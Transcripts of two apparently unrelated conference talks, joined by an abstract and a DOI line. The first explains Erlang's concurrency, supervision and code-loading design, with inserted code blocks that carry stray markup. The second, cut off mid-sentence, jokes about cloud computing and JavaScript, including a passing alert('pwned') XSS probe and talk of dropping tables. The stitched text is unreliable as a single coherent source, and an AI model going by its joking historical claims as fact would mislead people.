Typical thing. Should I time out? Should I try and detect if that process has died or something like this? Well, all those solutions are nice, but you'll want different solutions at different times. So by providing the low-level mechanisms, you can actually go in and program exactly how you want this communication to work, if you want synchronous communication. So what type of code are we looking at? This is the second code example here. This is not real code. Well, it's real code in the sense that it actually ran, but it's not product code. So this is from a small telecom system we were running in the lab, and it actually could talk to the small switch I showed in the picture with the train set, and you could control telephones on that and you could ring things through that as well. Or it could be a graphical interface as well. So what we've got here is that A is calling B and the telephone is ringing, and we have two processes here. So there's an A side which is doing the ringing A side call there, and there's a B side which is doing the ringing B side. And these processes are just sitting waiting for messages to come in. And all this is asynchronous. It has to be, because other people might try and call us. If other people try and call us, we have to say, no, we're busy. That's what the second-from-bottom case on both sides is. Someone sends us a message seize. So if we get a message seize, the PID there, that's the process identifier of the process trying to call us, and we just send back the message rejected. No, you can't call us now, we're busy. And then we make a recursive call there and sit and wait for the next message. So both sides just sit and wait for messages. The same thing on the B side. If the B side gets a seize, it replies rejected and calls itself recursively and sits and waits for the next message.
Now what happens if someone answers? So the B side goes off hook. Okay, we stop the dial tone, we send answered to the A side as a reply and we go into a speech mode. The A side is now going to get an answered. So it's going to stop its tone and it's going to tell the switch to connect A and B together and it'll go into speech as well, and sit and wait for messages. But both of these processes are running asynchronously on either side. If the A side goes on hook, it sends cleared to the B side, stops the tone and goes back to idle, and the B side gets the cleared so it stops the ringing and goes to idle again. So you've got these things running, completely asynchronously between them. And as I said, this code actually worked, but it's not production code. Production code would have a lot more stuff in it that needs to be done. But the basics are exactly the same. And you see here the basics: we're starting a lot of processes in the system. So typically you'd have at least one process per connection even when it's not doing things. Then you start up new processes when calls are made. This also modeled quite well the specifications of how the system should work. They didn't talk processes, but they were talking state machines and inputs and events coming in and actions to be done and other events being sent out as well. This modeled that very well. So, the error handling. Okay. The basic premise here is errors will always occur. You're always going to get errors in the system. Accept it, get over it and work with it. They might be programming errors, they might be hardware errors, you might just get garbage input or something like this from the outside world. The classical telecoms case is that some road works dig up the telephone lines and you get a deluge of inputs coming in which will mostly be junk. So yeah. So what do we do?
Well, the second basic premise of this is that the system must never go down. So we're going to accept the fact that errors are going to occur. You might actually lose a couple of calls, you might be losing connections, but the system as a whole should always be able to survive. That's just not optional. Yeah. So parts may crash and burn, but the system must never go down. And that means with your error handling mechanisms, you need to be able to detect errors. That's one thing, of course. You need to be able to contain them, to make sure that the effect of the error doesn't spread in an uncontrolled way. You need to be able to handle errors and you need to be able to recover from errors. Things are going to crash in the system. How do I make the system in such a way that it will keep on going and still keep working? And again the mechanism is very simple. It's based on a concept called links. So I can set up a link between processes. And a link doesn't affect communication or anything. What happens is that when one process crashes, dies, terminates, whatever you want to call it, it sends an exit signal to all the processes it's linked to. It's basically saying I'm dying. That's what the signal says. And if that signal comes from a crashed process, the process which receives that signal will crash as well. And it will in turn send exit signals out. So if I've got a group of processes that are linked together and one of them crashes, they all crash. Which is fine. Because I'm assuming they're working together. If one dies, it's not reasonable for the others to continue. They'll all go down. But say I want to monitor these processes. I want to detect when something crashes. And I can't link to it, because then I die. So there's a feature where you can trap exits. So if I'm trapping exits, I'm linked to another process, I get an exit signal from it,
I don't die. I see it as a message in my message queue and I can just do a receive and look at it. Which allows me to monitor other processes in the system. Therefore, I can build fault-tolerant systems like this. That is the basic mechanism. Literally, that's it. And what always surprises me is how simple it is and that it actually works. It does. How can you build systems that run for a long time using these mechanisms? So what do you need to build a robust system? Well, you need at least a couple of things. One thing you need to ensure is that some functionality always survives, is always available. If that functionality is not there, the system is not running. So that's something that needs to be done. The other thing is when things crash, you need to be able to clean up after them. The thing that crashed might have allocated resources or set things or whatever it might be. I have to be able to clean up afterwards so the system can keep on going. And you need at least two machines, of course, for distribution. Now, to handle the first one, we have a concept called supervision trees. You divide processes into two groups, workers and supervisors. And you build something called a supervision tree. And supervisors, they start their children and they monitor their children. Yes, it's a convention. It's a convention of doing this. It can be implemented different ways, but it is a convention. So in the actual system, at the Erlang level, processes are all equal. There's no process hierarchy or anything like this. All processes are equal. It's a very egalitarian system, to be honest. We'll see that with code as well, too. There are no special code modules or anything like this. All code is equal. All processes are equal. So we build this on top of the process structure. And this means that the supervisors just monitor their children and they know what to do when a child dies. Restart it. Well, maybe ignore it.
Maybe it's okay if this child dies. Or maybe it depends on how the child dies. If it exits normally, we can just leave it. If it crashes, we restart it. Or, for example, maybe we decide if one child dies, we have to kill off all the other children and restart them all. Yeah, we kill a lot of children here. I couldn't make the we-kill-our-children T-shirt, I'm afraid; that wouldn't have been accepted, yes. In this case, we also kill our parents and our siblings as well, too. We're pretty... So, yeah. That's the basic mechanism for it. You can control in your supervisors how they're to handle their children dying. Another way, for example: maybe if my children are dying too often, something is seriously wrong and I should give up. So I kill off all the rest, then I die, and I pass the buck up to my supervisor who then decides whether to retry again, et cetera, et cetera. You can build these things. A typical case: you get a bad error in a server, which means it just keeps crashing the whole time and it's not fixable. Actually, this is quite surprising. As I said, this is a very simple mechanism implemented using links and trapping exits. So supervisors link to their children and they trap exits to get exit signals from them. And it's very funny, a former colleague, Joran Borgia, he was working for a company. They were building mobile products. I think they were selling them to Russia or something like this. And they had a product that worked and everyone was happy, until someone went out and looked in the error log and they found the system was crashing all the time. But it was being restarted the whole time, so they didn't notice that the system was going down. So servers in the system were crashing, they were being restarted, and everything just kept on going, right? Which, of course, is what you want, but yeah, it doesn't feel right. So that's one thing we're doing here.
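The link/trap-exit mechanism just described can be sketched as a tiny restarting supervisor. This is a minimal illustration built only from the primitives in the talk (spawn_link, trap_exit, exit signals); the module name `simple_sup` is invented, and a real OTP supervisor takes child specifications and restart strategies rather than a bare fun.

```erlang
-module(simple_sup).
-export([start/1]).

%% Start a supervisor process that runs Fun as its child and
%% restarts it whenever it crashes.
start(Fun) ->
    spawn(fun() ->
                  %% Trap exits: a child's crash arrives as a
                  %% message instead of killing us too.
                  process_flag(trap_exit, true),
                  supervise(Fun)
          end).

supervise(Fun) ->
    Pid = spawn_link(Fun),               % link to the new child
    receive
        {'EXIT', Pid, normal} ->
            ok;                          % child finished; leave it
        {'EXIT', Pid, _Reason} ->
            supervise(Fun)               % child crashed; restart it
    end.
</imports>
```

A supervisor like this distinguishes a normal exit from a crash purely by the reason carried in the exit signal.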
We're just keeping track of processes and restarting them according to certain rules when they die. This is just to ensure that functionality is there, right? The other case is cleaning up. If a process crashes, it might have allocated resources. How do I reset and restore those resources? Typically, you'll have a server which is managing the resource. It will typically link to its clients. And if a client crashes before it's managed to free the resource or reset it or whatever it might be, the server will detect this and it can clean up after the client and fix things like that. And processes use the same mechanism for monitoring their coworkers. As I said, you might have a set of processes that are linked together; if one dies, they all die. That's what you want. I'm still surprised it works. Well, not that it works, but that it's actually as useful as it is. We've got two things. We've got links and trapping exits. That's it. That's what you use. The communication, what have you got? You've got starting processes, sending messages and selective receives. That's it. That is the Erlang concurrency model. And yeah, it works. I'm very surprised about that. Well, we tried pipes. Pipes. Yeah, we tried pipes. We tried a lot of different mechanisms we thought would be useful. This is what's left. This is because it worked, I guess. And with these mechanisms, you can build anything else you want on top. So if I want a complex synchronous communication mechanism, which I occasionally do, I can build this on top of the asynchronous messages, the handling of links, detecting when processes die, et cetera, et cetera. I can build my specific case just there. I don't have to make a general tool which can handle anything anyone might be able to think up and dream up. Yes? In what sense? The question was about the call stack. Yeah. Yes, there is a call stack. Okay.
So Erlang does what most, well, a large portion of other functional languages do. It detects the tail call. So the last call is basically transformed by the compiler into a jump. If we step back here, when we're doing the recursive call to ringing A side here, the compiler says, oh, this is a tail call. This is the last call. I will basically clean up the stack and jump back again. So I'm actually sitting doing a loop here. What's nice about this case is it won't just handle the recursive case, it handles every case. So when I call idle, for example, I'm also making a jump there. So I'm sort of looping around a big collection of states here. That's pretty common fare. And otherwise it wouldn't work. Okay. Otherwise, yes, you crash the system. It also means if you get it wrong, you'll crash your process eventually because your stack will run out. So yeah, that was that. Code handling. Okay. So you need to be able to handle code while the system's running and upgrade code dynamically. And well, it's simple here. The module is the unit of all code handling. So code comes in modules. You load modules, you delete modules, you upgrade modules, et cetera. You work on modules. That's easy. And how the Erlang system works is that you're allowed to have two versions of every module, the current version and the old version, in the system at the same time, and you can have processes running either of them. That allows you to do a controlled takeover. So I can have processes running the old version. I can load in a new version of the code and I can tell them when and how they're going to migrate to the new version of the code. And for that to happen, to be able to do that, you need the last point. You need a very well-defined behavior with respect to code. So when I call a function, I have to know which version of code I am going to get. Do I get the same one I'm in now? Do I get the new one?
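The well-defined rule can be sketched with a small stateful server. A local call like `loop(N)` stays in the version of the module the process is already running; a module-qualified call like `?MODULE:loop(N)` always goes to the current version, so the process migrates at its next iteration when a new version is loaded. The module name `counter` and the message protocol are invented for the example.

```erlang
-module(counter).
-export([start/0, loop/1]).   % loop/1 exported so the qualified call works

start() ->
    spawn(fun() -> loop(0) end).

loop(N) ->
    receive
        {bump, From} ->
            From ! {count, N + 1},
            %% Fully qualified tail call: if a new version of this
            %% module has been loaded, the process picks it up here.
            ?MODULE:loop(N + 1);
        stop ->
            ok
    end.
```

This is also why the loop must be a tail call: the compiler turns it into a jump, so the process can sit in this receive loop indefinitely without growing the stack.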
With that, you can build systems on top that can handle upgrade of code on the fly. Because of this. I mean, a lot of other languages have the possibility of loading code while the system is running, but often they don't describe what happens when you do that. What happens if I reload a function that I'm actually running in at the moment? Is it going to crash or not? Will I get new code or whatever it might be? In Erlang, it's very well defined exactly what's going to happen, which means you can build systems that do hot code upgrade. So those are the basic mechanisms. The sequential language, a simple functional language; the concurrency with processes and message passing; the error handling with links and exit signals; and the code handling as well. I'm not going to go into OTP, but it's there. It's the Open Telecom Platform. It's a set of design patterns for building concurrent fault-tolerant systems. I've got these tools, how do I use them? So it's design patterns for doing that. It's a set of libraries that provide code and support for doing these things. And also a set of tools which allow you to build systems and make releases of these systems based on these principles. Okay. Again, it's a library. If you don't want to use it, you can do it yourself. Sometimes OTP fits like a glove. You will use it. Sometimes it just doesn't, and sometimes you just want to mix. You can do all those three cases. The whole of OTP is actually written in Erlang. There's nothing strange going on there in that sense. There is one important thing to remember here. There's absolutely nothing about telecoms in OTP. So yes, it's called the Open Telecom Platform, but that was just a politically correct name inside a telecom company, right? And open is always good. Calling something open is fantastic. It doesn't mean anything, but it's a very good thing. So, it says telecom.
It might be a platform, but there's nothing about telecoms in OTP. So what I'm just saying here is that if you're interested in Erlang and you see it's telecoms, that does not mean it's locked into telecoms. The closest you can say is it's good for building these types of applications. Yeah. I want to do one thing here. I don't really have to say this. Think OS. So this is what the Erlang system was designed for and how you work with it. It's not like a language with a library, where you build something and you call a function that does something. You have the Erlang system running and you plug your code into it. It's very much like an operating system. In a normal operating system, whether it's Linux or Windows, you have a number of processes. You might start your own processes in the running system, doing your stuff. They'll be communicating. They might be communicating with other systems, but they're part of the whole system. It's the same thing working with Erlang, right? When you start up the Erlang system, there is a running system. It's like an operating system running there, and you can start your processes doing their work and things like this in the system itself. All the functionality is designed to work in that way. So when we were developing the system, we were thinking in a very operating-system-like way, which means it's quite funny. I've been listening, yesterday and today, to various other presentations here about handling concurrency and asynchronous things like that. There you see it. They're working on a standard sequential base and they're trying to build this stuff on top of it. From our point of view, that's completely wrong. You put the concurrency, the operating-system level, at the low level, then you build your things on top of it, which means all these questions about how do I design asynchronous communication? It's trivial, right?
It's there. I don't have to do anything special to do it. I don't have to build a library on top to try and make it so I can have things working together with parallelization and synchronization, et cetera. It's just there, right? That's where you want it. That's where you want it, at the base level, not in a library on top. Yeah, I'll say. Yeah, I was thinking of, I can't remember the one on asynchronous, I can't remember who gave it yesterday. He was presenting a language called RQ where you could do things in sequence and things in parallel and stuff like that. That actually looked very much like a language I did for my train set, because you wanted to define a program for how trains should move. So you wanted to do things in sequence, it should go from there to there to there, and something else would work in parallel. So it was actually the same type of thing. Sorry, that's just, again, that was putting it on top. So yeah, the Erlang system is very operating-system-like when you run it. That's how you should think about things. And that's the place to solve problems with concurrency, with parallelism, asynchronous events, anything like that. Not as a library on top; then it gets all messy. So yeah, this works. It's fine, right? But well, the brave new world, how does this affect other things? And I think the main thing to look at here is to realize, when we go back to this list of properties of telecom systems, at least as they were then, you look at it, most of those have nothing to do with telecoms. I want to have very large numbers of concurrent activities. Great. I'm writing a server for my website and I want to be able to have 100,000 connections at the same time. That's that. I want fault tolerance. My site should not go down, et cetera. And most of those things you'll find are equally valid for a lot of systems today.
I would say our difference was that because we were trying to solve this problem, that's why we got to the stage where we are. We didn't take an existing language and try to make a library on top to solve the problem. We designed the language and the system to solve this problem. And what's happened now is that more people have realized that this is the problem. This is not a telecoms problem, this is a much more general problem. I want these things. Of course I don't want my site to crash. If my site crashes, I'm not making money. I want to handle lots of connections, of course. Same thing. All these types of things you want to do. I want to be able to do maintenance while the site's running. Of course you can do like World of Warcraft and take it down at three o'clock on Wednesday morning, but why bother with it? Things like this. Okay, it's not controlling hardware. Well, unless you consider, say, IP channels as hardware, things like this. You've got timing issues. Most of these things are valid today and are desirable in systems. That is why Erlang is valid today, because we're solving these types of problems. That's what we're doing. Another feature is that the Erlang concurrency model scales. Having separate processes with message passing between the processes scales. Sharing stuff does not scale. However you look at it, if you start sharing things, then you have to start locking and synchronizing, and that gets more costly the more sharing you're doing. Sending messages might sound like it's costly, but in the long run it actually saves you a lot. It saves you a lot of problems at the cache level. You have a lot of cache coherency problems. Keeping things in the cache which might be accessible from, say, different cores, that can become very costly. It might look cheap, but it can become very costly. Having separate copies can actually be much, much cheaper, much more efficient. So yeah, we'll do this.
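The share-nothing model he's describing looks like this in practice — a small sketch where two processes exchange data only by copying messages between their private heaps, so there is nothing to lock:

```erlang
%% Share-nothing concurrency: the only way to exchange data is to
%% send a message, which is copied into the receiver's own heap.
start() ->
    Echo = spawn(fun echo/0),       % a new process with its own heap
    Echo ! {self(), "hello"},       % the message is copied, not shared
    receive
        {Echo, Reply} -> Reply      % -> "hello"
    end.

echo() ->
    receive
        {From, Msg} ->
            From ! {self(), Msg},   % reply by copying the data back
            echo()                  % tail call: loop forever
    end.
```

Since no memory is ever visible from two processes at once, there are no locks here and no cache lines bouncing between cores, which is the scaling argument he makes.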
Yeah, just a little bit about the internals, about the Erlang SMP implementation, right? A bit about how it works internally, very shortly. So the goal is that SMP should be transparent to the programmer. When I'm designing my system, I should not have to worry about whether I'm running on four cores or eight cores or six cores or whatever, things like this. I might have to, I might want to, but I shouldn't have to. And the BEAM does this with a concept it calls schedulers. So when you start up the BEAM, you start up a number of schedulers. Okay? So it's running in one Erlang virtual machine, one BEAM, one operating system process. You have a number of these schedulers running. And each scheduler is a semi-autonomous BEAM virtual machine running Erlang in it. It's only semi-autonomous, of course, because they'll be communicating with each other and cooperating with each other. But they try to be as separate as possible. And generally you run one per thread. You use one scheduler per VM thread. And you have one thread per core running on these things. That's the default. And they try to run as separately as possible because you want to avoid synchronization. Synchronization costs, right? You want to avoid that. Okay. So what does this give me? Why can't I just, say, if I've got eight cores, start up eight Node.js processes and have them run, right? I get things like balancing of the system. The system balances these things for me automatically, right? Well, one thing I forgot to mention here: there's a simple concept called process stealing. So if a scheduler has nothing to do, it will start looking at its neighbors and see if it can find one with something in its run queue, and steal a process and say, oh, I can work on this one. That's the local level.
At the top level, well, one of them will become a master eventually, and it will start looking at all the schedulers and try, at a more global level, to balance the workload over them. All this time the schedulers are still running. We're not stopping anything to do this. Everything's still running. We're just doing this global-level optimization. And yeah, this works because each scheduler has its own run queue. It also works the other way. So the load balancing tries to spread the load as evenly as possible over all the schedulers, over all the cores. It also goes the other way and says, I'm actually not using these. It will try to compact cores. It will say, I might have wanted to run eight cores, but I'm actually having so little load, I can do everything on three cores without any problem, and it will try to compact things, which means it can shut down cores, which means it can save energy. All this is built into the system. So you've got these two optimizations working against each other, one trying to spread it and the other trying to compact it. That works. You can control these things. You might want to say, I want to run a certain number of cores, et cetera. You might want to say how hard it should try to spread things or compact things. I can control this. Each scheduler has a run queue. When processes are waiting for a message, they're just suspended. There is no cost to the system to have processes sitting there waiting for messages. There is no runtime polling. When a message arrives at a process, that process is put on the run queue, and when its turn comes, it can start looking at the message. So typically in Erlang systems you will have a lot of processes just sitting there waiting. They'll receive a message, they'll do something, they'll send some other messages, then they'll go and sit and wait for the next message, suspended. So yeah. There's a preemptive scheduler as well.
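Some of those controls are exposed as emulator flags and runtime calls. A sketch of a few of them (check the `erl` man page for your release; the exact flag set varies between OTP versions):

```
# Start the VM with 4 schedulers, of which 2 are online initially:
erl +S 4:2

# From a running Erlang shell:
erlang:system_info(schedulers).               % schedulers configured
erlang:system_info(schedulers_online).        % schedulers currently active
erlang:system_flag(schedulers_online, 4).     % bring more of them online
```

Taking schedulers offline and online at runtime is the same mechanism the compaction optimization uses when it decides the load fits on fewer cores.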
So after 2,000 reductions, roughly 2,000 function calls, a process is rescheduled, which means that no running process can block the system. Again, that gets back to the problem in telecoms: the system can't block. So just because someone's doing a lot of work doesn't mean that everything else should block in the system. So we have a preemptive scheduler to do that. No part of the system blocks. Process memory: each process has a separate heap. All process data is local to that process heap. Sending messages means copying data from one process heap to another process heap. This is actually not required by Erlang; it's an implementation detail. But then of course you get the question, isn't all this copying terribly inefficient? Every time I send a message, I'm copying data backwards and forwards all the time. And well, yeah, sort of. It's inefficient, maybe. But there's a big but. Having separate process heaps has a lot of important benefits when you actually start looking into the implementation and at how things work. The simplest one is that it allows us to garbage collect each process separately. So I can just garbage collect one process. I don't have to worry about links to other processes and things like this. That means I don't have synchronization. When I'm garbage collecting, I don't have to synchronize between processes. I don't have to synchronize on the whole heap. And that is an enormous win. It's even bigger than a big win, right? It's an enormous win. Once you start having to synchronize access to memory, everything gets slower. If you look at, for example, the amount of effort they put into the JVM to make garbage collectors that can run on multi-cores, and they still have synchronization problems there, you can see how it is. Yes, you can buy a product that doesn't. But yes, it's not easy. The garbage collecting itself becomes more efficient. I don't have to do a real-time collector.
I can actually just stop a single process and garbage collect it. That will be so fast, I won't notice it. It becomes more efficient, it becomes simpler. Simplifying garbage collection is a big win. Bugs in the garbage collector are a real bastard to find, right? Because you won't see them until a few garbage collects later, when someone references data somewhere wrong. It's almost impossible. It means you can make better garbage collectors, more efficient algorithms. And again, as I mentioned, cache coherency and NUMA-type architectures. You can do these things. Just a bit about the internals. Now, we're nearing the end here. So what I'm going to say is, Erlang is not good for everything. If someone tells you Erlang is good for everything, they either don't know what they're talking about or they're lying. Just accept it. It's not. It's good for some types of applications. But it's also very good for interfacing with other things. So you'll typically see in a lot of, maybe not most, but a lot of Erlang applications, Erlang is used together with other languages, each doing their bit. We tend to say use Erlang as some form of concurrent glue to put things together. It's like this in the Ericsson products. They'll use Erlang at the logic and control level, and then they might have specialized hardware for doing signal processing. But Erlang controls that, right? That's fine. That's sort of perfect. I think we might have had this idea from day one, but pretty soon we realized that that was the way it is. And I think that maps very well. If you look at large systems, large applications, you will find that most large applications have different requirements in different parts of the system. So therefore, why try to use one language for everything when no language is good at everything? Yes, you can program things in any language. That's not the problem. But is it good for it? Is it suitable for it?
Erlang is suitable for one type of application. Use it for that. If you want something else in the system, say if you want number crunching: yeah, you can do arithmetic in Erlang, it's not very fast. It might be better to get some libraries in Fortran or C or something like that and then call them from the Erlang system to do all the work. Fine. Or if you're doing signal processing. So, yeah. Then the last bit, just to say how good we are. Okay. Here's a diagram of some, not everyone, of some companies actually using Erlang seriously in products. So it has spread. I think we became uncool about 2008, something like this, right? We were cool for a while around 2007, 2008. We're not cool anymore, but we're actually being used, which is very nice. So we're in the class of languages, Mr. Stroustrup said there were two types of languages: those people complain about and those no one uses. We're in the class that people complain about. We're actually being used. Some of these are quite fun. WhatsApp, of course. They're running two million TCP connections on one machine, on one Erlang system. That's a lot of Erlang processes. That's impressive. Talking to one of the guys there, he said they actually peaked at three million or something like this. TCP connections on one machine running Erlang. Yeah. Bet365. They're a British online betting company. Yeah. Sorry. Yes? Okay. Give me the name and I'll put it on my list. Yeah. If you look through these, they're very different types of companies. I mean, Bet365 does online betting. I mean, they're definitely in it for the money. They're using Erlang. Not the whole system, but part of their system. So if you go onto their site and you're looking at online games and getting online odds, dynamically getting odds while you're looking at the games, Erlang is distributing those odds. You've got Klarna, yeah.
Basho, they make Riak, which is almost completely written in Erlang. And things like this. You've got other stuff up there. You've got gaming companies as well and things like that. So we are actually being used. Well, there are a couple of common tools that are based on Erlang, actually. So CouchDB is written in Erlang, partially written in Erlang, it varies depending on which one you use. Riak, of course, as I mentioned. RabbitMQ and ejabberd are implemented in Erlang. Now, I'd say most of the users of these systems don't care. They don't know it's written in Erlang, or if they know, they just don't care, because all of these have interfaces for other types of languages as well. But they are implemented in Erlang. I saw somewhere even NASA was using Rabbit. Not in space, but, well, that's my goal. That's my goal. But anyway, yeah. So we are actually being used, and in a lot of places no one cares that it's Erlang. It's just a useful tool. For example, Rabbit and ejabberd. So, yeah. Almost bang on time. That's it. That's me. So, yeah. Questions first. More questions. We had some. More questions. Yes? Is it appropriate for massive parallelism, sort of map-reduce crunching problems? Are you talking distributed in this sense? So the question was whether it's suitable for massive map-reduce type problems. Distributed: yes and no. There's a bit of a problem with distributed Erlang when you're running many nodes. Natalia will talk about that more tomorrow, and actually talk about solutions for that. So, yeah. A lot of the things were designed back in the old days when two processors were a lot. So, yes, it is, in principle; you might need some detail work for it. So, can it handle concurrency? Yes. Any more questions? Yeah. Sorry. Have you been following along with the development of running Erlang directly on hardware inside of Xen, or something equivalent to that? And if so, what are your thoughts on that, since it is very similar to an OS? Yeah.
I know of it. I haven't really looked into it. I know of it. It was secret until recently. Yeah. What that is, it's Erlang on Xen. They're actually running the BEAM. It is a standard BEAM. They just sort of chopped off the bottom bit and put stuff in to take the place of the operating system. So, yeah. I have absolutely no idea if that's a sensible use at all for the application as a whole. But, yes, there's nothing strange about that. In one sense, if you look at how Erlang uses the operating system, in many ways it's quite basic, really. It does a lot of the work itself. For example, the memory management. It does its own memory management. It does a malloc occasionally to get memory from the operating system, then it handles it itself, because it has to do things in parallel between the schedulers. If you just do malloc and free all the time, yes, the system will be thread safe, but it's costly thread safe. Yeah. Yeah. Yes. You should be able to shut down in a couple of milliseconds too. I don't know. Take this machine here, and it takes about half a minute or a minute to shut down. Right. And it takes a long time to start up too. Yes. Yeah. I quite agree. Why? Yeah. Yes. Yes. Yeah. So, it's there. In one sense it's probably not that surprising, because Erlang makes quite little use of the operating system. Yeah. So, any more questions? Okay. Yes.
Erlang was designed around a set of requirements for telecom systems. They were distributed, massively concurrent systems which had to scale with demand, be capable of handling massive peak loads and never fail. Erlang's features make it perfect for multi-core computers, although it pre-dates them, and for the Internet Age and the Cloud, although it pre-dates them as well. This talk will describe how Erlang was developed as a language and system that could solve these problems. It truly demonstrates the benefits of concurrency-oriented programming.
10.5446/50634 (DOI)
if they're legitimate or not. I think Abraham Lincoln said that. And so, since I don't know who this is, but I do have this really old book, so we'll just say that that's the guy. And I'll be making up quotes throughout the whole day. That actually happened, right? You know, there's the Azure cloud and the Amazon cloud and the Google cloud. There's five computers. They just happen to be clouds, computers. Here's a picture of the Azure cloud. Now, you know, we're a little behind. We just got color. But we're getting there, right? We're loading up new machines in the Azure cloud every day. So pretty soon we'll catch up with the bookstore. So on the cloud side, we've got some really interesting stuff. And since this gentleman was an older guy who understood hardware but didn't understand the web, I wanted to explain it to him in a way he understood. And I said, well, imagine what they taught us about operating systems in school, that the operating system has these characteristics like memory management and networking, and it sits on top of this hardware. And he's like, yep, I totally get that. I did that work. And I said, well, now we can virtualize those, right? We can take those things and move them from place to place. And we can go from my data center to the cloud and from the cloud to someone else's data center. And he's like, yep, I love that. That's totally great. And I said, yeah, and you can do anything now. You can run Linux in Azure. And that's cool, even if you want to do that. I don't know if you want to do that. Maybe you could. And he thought that was amazing because he was used to building machines from scratch. And I was like, well, now you could just go up and say, I want to make that one. I want a Jenkins machine. I just have to type in two lines of code and drop that into a prompt and say, make a new virtual machine. And it's got ASCII art, which is awesome. And then boom, suddenly I've got infrastructure as a service.
And I showed him some slides and he kind of understood that. But I had to explain to him the difference between infrastructure as a service, which is virtual machines, where it's basically like, it's like a puppy. You have to feed it and water it. I don't have any pets, so I don't know how this works. But presumably you have to water the dog at some point. But the thing I don't like about virtual machines is that you have to be responsible for them, keep them alive. You have to run Windows Update and all those kinds of things. And Windows Update is just a horrible situation because it always runs in the middle of me typing, you know, how you're typing, typing, typing, and then your hand is coming down just as Windows Update is coming up and gravity is bringing your hand down. You can't stop it and you know it's coming and it's like restart, no. And you're like, no, but the world is in slow motion, your hand is coming. And nothing can stop a Windows machine from restarting. You know that, right? Once it's happened, there's effectively no way to get around it. Actually, there's one way. I don't know if you heard about this. The only way to stop a Windows machine from restarting is a dirty Notepad. That right there, that will stop a Windows machine. So if it's going down, then you just quickly do Start, Run, notepad, Enter, dirty it, boom, and then you'll stop it. And the way that I, so I renamed notepad to just N. And that saves me a lot of Notepads that I don't have to write later. So I recommend that you do that for all of your systems. Anytime a Windows machine is going to shut down, you can stop it. But I don't want to deal with virtual machines. It's a hassle. So I prefer to think about things like platform as a service. So rather than looking at it like this, I look at it like that. Virtual machines are like a house. I've got to maintain it. I've got to paint it. I've got to clean the gutters. I like to trash my hotel room.
Like my hotel room here that the conference bought for me. It's actually on fire right now. And that's like platform as a service. You know, I can just torch it and it gets cleaned up by some very nice person. I don't know. I've never seen them before. I know that they come in and they fix the thing up. And it's amazing and it makes me really, really happy. And I can go and scale that out, right? I can go and scale it out to multiple machines and that makes me happy. And I explained this to this gentleman. And remember, he's used to doing things the old-fashioned way, like physically buying the computers and plugging them in. And now it's just a slider bar. And this makes old people like myself very unhappy. Because there's like young people, like this young lady here, who probably when she scales out her web farm, she just scales it out. It's like, oh, this is taking like five minutes. Oh, this sucks. And it used to take me like a week to scale out a system. But now I can just do it from the command line and just go scale out. And it just magically works. And when you ask someone, like, how did that work? They're like, what just happened? All you can say is, it's magic. It's magic. And I was explaining to this person that, like, well, the cloud is great because the cloud doesn't care about what language you want. Because he's like, well, what should I learn? What language should I learn? Should I learn C#? Should I learn Node? And I was like, no, man, pick whatever one you want. And he could not believe that. He's like, that's great. And he almost passed out. Good clouds don't care about language choice. Pick whatever you want. And it's all open source. You can have all sorts of fun. It's all on GitHub. I love that GIF. I wish I could have an animated GIF as the desktop in Windows. I would just have that guy all the time. So that's on the server side. You pick anything you want. You can scale out. You don't have to do any work. It's amazing.
I said, but let's talk about the browser because that's really interesting. If we go back to looking at things like this, what's an operating system? What does it really mean to have an operating system? I had a couple of ideas around that. And I said, well, in the old days, you would sit down in front of a machine that looked like this. You type some stuff, but it really happened on a refrigerator that looked like this. And you would type something in and a user interface would come up. Uh-oh. There we go. And a user interface would come up, but it was really, it looked like it was there, but it was actually over on the refrigerator there. So this was really just a dumb terminal. That's how things worked originally. And then this happened. Tim Berners-Lee invented the Internet. And this is actually the first web page, first web page ever. And this is really great. This is at the original URL too. So this is the beginning of the Internet. You can go to that URL. It's still there. And actually, an interesting little side story about this. There's a guy at work named Henrik. He's a peer of mine who works on the ASP.NET team. And I met this guy and he's this, you know, he's a super cool European person like you guys. And, you know, he's thin and attractive and he's got like perfect hair and it's obnoxious. And his shoes are nice. I tried to wear my Euro jeans, by the way. It didn't work. And so then I meet the guy, hi, nice to meet you, Bob. And then he leaves. And then my buddy Phil says, you know who that was? I don't know. It's a guy named Henrik. He invented HTTP. So I go and he has a Wikipedia page. So right there, that's the problem. So I go and I read the HTTP spec and it says right there, Henrik Frystyk Nielsen. And I'm like, oh man, did I say something wrong about it? So then I see the guy come by again and I go, hey, Henrik. And he's like, hey, Scott. And I'm like, what do you say, you invented HTTP? What have I done? I've got a blog.
So I was like, good job on the Internet. And then I had like a weird curtsy. I don't know what I did. I was just like, and I just kind of like, definitely Visual Basic. Definitely, definitely. And I can't even look Henrik in the eye anymore. It's very, very uncomfortable. Turns out he was Tim Berners-Lee's intern. So while I was downloading animated GIFs on AOL, he was inventing the Internet. So yeah, I need to update my resume. So this happened, but it wasn't really an application platform, right? It was just pages up there. Look, the paparazzi are always following me around Europe. And then this happened. And how did we know that that happened? Because we were visiting web pages and everything was going along really quickly. And then Java loaded. And then that was a thing. And we had like a little island within this larger world. And then these guys were like, we can do it too. And then these guys were like, we've got YouTube. We're still relevant. But why were we doing that? Why did we do that? Because we really wanted a machine. We wanted an application platform. So we built this plug-in virtual machine inside of the browser. It was an operating system inside of this world. And it's a little bit uncomfortable because people and users don't really know what to do about that. In fact, I went to the Toyota dealership to have my oil changed recently. And I went in there and I like to see how their systems work. And usually they have like an AS/400 and they'll terminal-server into the back end, right? But I come in and he's got a whole new system. And I'm like, what's going on? You got a new system? And he's like, oh, we've replaced the whole system. It's much, much better than before. Let me show you. And he fires up XP. And he's like, and then he fires up Firefox and he loads a Java jar file. And it says, are you sure you want to use Java? And he's like, yes. And it's like, are you really, really sure you want to use Java? And he's like, yes.
Sign your name, block, unblock all. And then he loads a jar file up and then loads a terminal emulator in Java and then terminals back to the same back-end system. And then says it is way better than before. So we end up with these weird experiences where we've got this browser with a body and a document and then a little island of interactivity right there. And all the while I'm ignoring that JavaScript is happening, right? And JavaScript's a joke at this point. I'm not even thinking about it. I assume that's JavaScript, right? It's like Java, but it's scripty. I don't know. I assumed that JavaScript was just typing alert('pwned') into a text box. And that was JavaScript. This is a flowchart of working in JavaScript and what it's like. It's a really accurate flowchart for my friend Leon. So, but then people started doing stuff with JavaScript that was really more impressive. They were doing things like emulators. Like this is a Commodore 64 emulator in JavaScript. And then I started to realize that you could do some crazy stuff in JavaScript that was beyond anything that I had thought about. And I said to myself, maybe JavaScript is useful for more than just dropping tables from unsecured database inputs. So why not do something like this? This is Fabrice Bellard's complete JavaScript Linux implementation. This is a full implementation of Linux written entirely in JavaScript emulating an Intel Pentium processor, which could then allow me to come out to the command line here and then run an open source C compiler and then 